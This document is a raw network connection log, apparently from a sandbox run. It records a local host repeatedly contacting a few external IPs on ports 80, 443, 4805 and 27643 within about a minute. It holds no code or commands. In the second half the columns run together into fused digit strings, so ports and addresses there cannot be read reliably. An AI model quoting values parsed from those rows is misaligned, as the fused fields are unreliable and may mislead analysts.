Aug 21, 2024 10:58:38.254575968 CEST  80           60010      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:38.254671097 CEST  60010        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:38.254776955 CEST  60010        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:38.259540081 CEST  80           60010      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:39.705519915 CEST  4805         60009      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:39.709203005 CEST  60009        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:39.709409952 CEST  60009        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:40.916915894 CEST  60011        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:41.154529095 CEST  27643        60011      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:41.154681921 CEST  60011        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:41.154927015 CEST  60011        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:41.162200928 CEST  27643        60011      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:41.982279062 CEST  27643        60011      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:41.982579947 CEST  60011        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:41.982846975 CEST  60011        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:42.118360043 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:42.118415117 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.118519068 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:42.118992090 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:42.119007111 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.262285948 CEST  60010        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:42.270670891 CEST  60013        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:42.277271986 CEST  80           60013      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:42.277378082 CEST  60013        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:42.281301022 CEST  60013        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:42.288958073 CEST  80           60013      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:42.581675053 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.592375040 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:42.592431068 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.729630947 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.729690075 CEST  443          60012      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:42.730165005 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:42.730878115 CEST  60012        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:44.713346004 CEST  60014        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:44.718208075 CEST  4805         60014      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:44.718287945 CEST  60014        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:44.718619108 CEST  60014        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:44.723424911 CEST  4805         60014      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:46.290141106 CEST  60013        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:46.293212891 CEST  60015        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:46.298631907 CEST  80           60015      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:46.298738003 CEST  60015        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:46.298897982 CEST  60015        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:46.303750038 CEST  80           60015      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:46.409318924 CEST  4805         60014      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:46.409409046 CEST  60014        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:46.409696102 CEST  60014        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:46.995091915 CEST  60016        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:47.000010014 CEST  27643        60016      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:47.000231028 CEST  60016        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:47.000396967 CEST  60016        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:47.005951881 CEST  27643        60016      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:47.744050026 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:47.744083881 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:47.744158030 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:47.744468927 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:47.744484901 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:47.840440989 CEST  27643        60016      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:47.840517044 CEST  60016        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:47.840719938 CEST  60016        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:48.215075970 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:48.217068911 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:48.217084885 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:48.349237919 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:48.349303007 CEST  443          60017      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:48.349365950 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:48.350543022 CEST  60017        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:50.306446075 CEST  60015        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:50.309849977 CEST  60018        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:50.314987898 CEST  80           60018      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:50.315059900 CEST  60018        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:50.315246105 CEST  60018        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:50.320414066 CEST  80           60018      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:51.417726994 CEST  60019        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:51.422533989 CEST  4805         60019      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:51.422617912 CEST  60019        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:51.422879934 CEST  60019        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:51.427871943 CEST  4805         60019      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:52.853542089 CEST  60020        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:52.858556032 CEST  27643        60020      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:52.859241009 CEST  60020        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:52.859545946 CEST  60020        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:52.864365101 CEST  27643        60020      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:53.111084938 CEST  4805         60019      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:53.111172915 CEST  60019        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:53.111397028 CEST  60019        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:53.353394032 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:53.353435040 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:53.353497982 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:53.353915930 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:53.353930950 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:53.715838909 CEST  27643        60020      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:53.719209909 CEST  60020        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:53.719389915 CEST  60020        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:53.929933071 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:53.931751013 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:53.931792021 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:54.085664988 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:54.085732937 CEST  443          60021      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:54.085958004 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:54.086445093 CEST  60021        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:54.322700977 CEST  60018        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:54.328799963 CEST  60022        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:54.333688974 CEST  80           60022      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:54.333791971 CEST  60022        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:54.334098101 CEST  60022        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:54.339029074 CEST  80           60022      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:58.119079113 CEST  60023        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:58.124102116 CEST  4805         60023      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:58.124213934 CEST  60023        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:58.124558926 CEST  60023        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:58.129473925 CEST  4805         60023      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:58.337526083 CEST  60022        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:58.343472958 CEST  60024        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:58.348386049 CEST  80           60024      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:58.348500013 CEST  60024        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:58.348725080 CEST  60024        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:58.353627920 CEST  80           60024      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:58.728760004 CEST  60025        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:58.734363079 CEST  27643        60025      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:58.737029076 CEST  60025        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:58.737265110 CEST  60025        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:58.744524956 CEST  27643        60025      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:59.104022026 CEST  60026        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:59.104036093 CEST  443          60026      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:59.104105949 CEST  60026        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:59.104676008 CEST  60026        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:59.104687929 CEST  443          60026      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:59.595479965 CEST  27643        60025      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:59.595551014 CEST  60025        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:59.595792055 CEST  60025        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:59.599638939 CEST  443          60026      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:59.601172924 CEST  60026        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:59.601200104 CEST  443          60026      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:59.741954088 CEST  443          60026      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:59.742008924 CEST  443          60026      162.159.130.233  192.168.2.4
                                      Aug 21, 2024 10:58:59.742080927 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.742533922 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.852045059 CEST480560023135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:59.852128029 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:59.852530956 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:02.352307081 CEST6002480192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.355298042 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.360116005 CEST806002745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:02.360208988 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.360569954 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.365362883 CEST806002745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:04.629401922 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.741039038 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:04.741116047 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.741811037 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.746833086 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:04.760190010 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760225058 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:04.760294914 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760746956 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760757923 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:04.870168924 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.875158072 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:04.875443935 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.880147934 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.885108948 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:05.243050098 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.248317003 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.248333931 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.397342920 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.397411108 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.398025990 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.398452997 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.558904886 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:05.558990955 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:05.559464931 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:06.304542065 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:59:06.304619074 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:59:06.304816961 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:59:06.309578896 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:59:06.398216963 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.414736986 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.419576883 CEST806003145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:06.419652939 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.421536922 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.426282883 CEST806003145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:06.582381964 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:06.582540035 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:06.582977057 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:10.399950981 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.399991035 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:10.400068998 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.400346041 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.400360107 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:10.430870056 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.434236050 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.572133064 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.582475901 CEST806003345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:10.582489967 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:10.582652092 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.582653046 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.582823992 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.583111048 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.587568045 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:10.587977886 CEST806003345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:11.068237066 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.069880962 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.069907904 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224685907 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224751949 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224833012 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.225353956 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.423238039 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:11.423324108 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:11.423588037 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:11.587943077 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.592860937 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:11.593893051 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.594129086 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.598937988 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:13.305614948 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:13.307259083 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:13.307429075 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:14.587627888 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.590934038 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.595771074 CEST806003645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:14.595896959 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.596736908 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.601512909 CEST806003645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:16.238353014 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238405943 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.238478899 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238800049 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238816977 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.433995008 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.439004898 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:16.439161062 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.439418077 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.444282055 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:16.707581997 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.708739996 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.708766937 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845415115 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845485926 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845582008 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.846024990 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:17.369283915 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:17.369370937 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:17.369586945 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:18.323381901 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.328290939 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:18.328766108 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.329083920 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.334646940 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:18.602447987 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.606488943 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.611802101 CEST806004045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:18.612714052 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.615184069 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.621870041 CEST806004045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:20.038769007 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:20.038856983 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:20.039084911 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:20.277961969 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:20.279225111 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:21.855278969 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855321884 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:21.855412960 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855753899 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855767012 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.333355904 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.337089062 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.337112904 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.385514021 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.390362024 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:22.391257048 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.391525984 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.396315098 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:22.484874010 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.484932899 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.485009909 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.485855103 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.618762970 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.627300978 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.632210016 CEST806004345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:22.632323027 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.632713079 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.637554884 CEST806004345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:23.242227077 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:23.242306948 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:23.242710114 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:25.057440042 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.062488079 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:25.063297987 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.063883066 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.068707943 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:26.633655071 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.636774063 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.641661882 CEST806004545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:26.641767979 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.641937017 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.646806955 CEST806004545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:26.788219929 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:26.788330078 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:26.788580894 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:27.493582010 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.493618965 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.493736029 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.494013071 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.494033098 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.981358051 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.983114958 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.983129025 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129079103 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129162073 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129266024 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:28.129643917 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:28.260411978 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.265295982 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:28.265543938 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.265672922 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.270767927 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:29.085850000 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:29.086555004 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:29.086815119 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:30.660917997 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:30.683459044 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.004609108 CEST806004845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:31.005274057 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.010417938 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.015825987 CEST806004845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:31.792146921 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.850790024 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:31.850897074 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.851191044 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.856178045 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:33.134303093 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134346008 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.134494066 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134701014 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134716034 CEST44360050162.159.130.233192.168.2.4
